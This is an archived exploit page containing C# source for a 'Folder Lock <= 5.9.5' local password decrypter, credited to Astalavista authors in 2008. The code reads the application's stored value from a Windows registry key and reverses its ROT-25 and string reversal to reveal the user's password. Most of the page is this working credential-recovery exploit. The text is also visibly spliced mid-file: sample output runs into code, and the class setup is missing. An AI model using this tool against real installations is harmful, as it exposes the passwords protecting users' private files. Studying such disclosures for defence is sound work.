AOH :: HP Unsorted F :: VA1026.HTM

Folder Lock <= 5.9.5 Local Password Information Disclosure



Folder Lock <= 5.9.5 Local Password Information Disclosure
Folder Lock <= 5.9.5 Local Password Information Disclosure



/* 
 * Folder Lock <= 5.9.5 Local Password Information Disclosure
 * 
 * Author(s): Charalambous Glafkos
 *            George Nicolaou
 * Date: June 19, 2008
* Site: http://www.astalavista.com 
* Mail: glafkos@astalavista.com 
* ishtus@astalavista.com 
 *
 * Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability.
 * Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
 * The security issue is caused due to the application storing access credentials within the Windows registry key:
 * (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption. 
 * This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed.
 * 
 * Sample Output:
 * 
 * ASTALAVISTA the hacking & security community
 * Folder Lock <= 5.9.5 Decrypter v2.0
 * ---------------------------------
 * Encrypted Password: :3FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false); 
            String _pack = FLKey.GetValue("_pack").ToString();
            String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n"; 
        return strFL;
        }

        public string Reverse(string x)
        {
            char[] charArray = new char[x.Length];
            int len = x.Length - 1;
            for (int i = 0; i <= len; i++)
                charArray[i] = x[len - i];
            return new string(charArray);
        }

        public static string Rotate(string toRotate)
        {
            char[] charArray = toRotate.ToCharArray();
            for (int i = 0; i < charArray.Length; i++)
            {
                int thisInt = (int)charArray[i];
                if (thisInt >= 65 && thisInt <= 91)
                {
                    thisInt += 25;
                    if (thisInt >= 91)
                    {
                        thisInt -= 26;
                    }
                }

                if (thisInt >= 92 && thisInt <= 96)
                {
                    thisInt += 25;
                    if (thisInt >= 96)
                    {
                        thisInt -= 26;
                    }
                }


                if (thisInt >= 32 && thisInt <= 47)
                {
                    thisInt += 25;

                    if (thisInt >= 47)
                    {
                        thisInt -= 26;
                    }
                }

               if (thisInt >= 48 && thisInt <= 57)
                {
                    thisInt += 25;

                    if (thisInt >= 57)
                    {
                        thisInt -= 26;
                    }
                }

                if (thisInt >= 58 && thisInt <= 64)
                {
                    thisInt += 25;

                    if (thisInt >= 64)
                    {
                        thisInt -= 26;
                    }
                }

               if (thisInt >= 97 && thisInt <= 123)
                {
                    thisInt += 25;

                    if (thisInt >= 123)
                    {
                        thisInt -= 26;
                    }
                }


               charArray[i] = (char)thisInt;
            }
            return new string(charArray);
        }    
    }
}


Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com 
www.astalavista.net 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.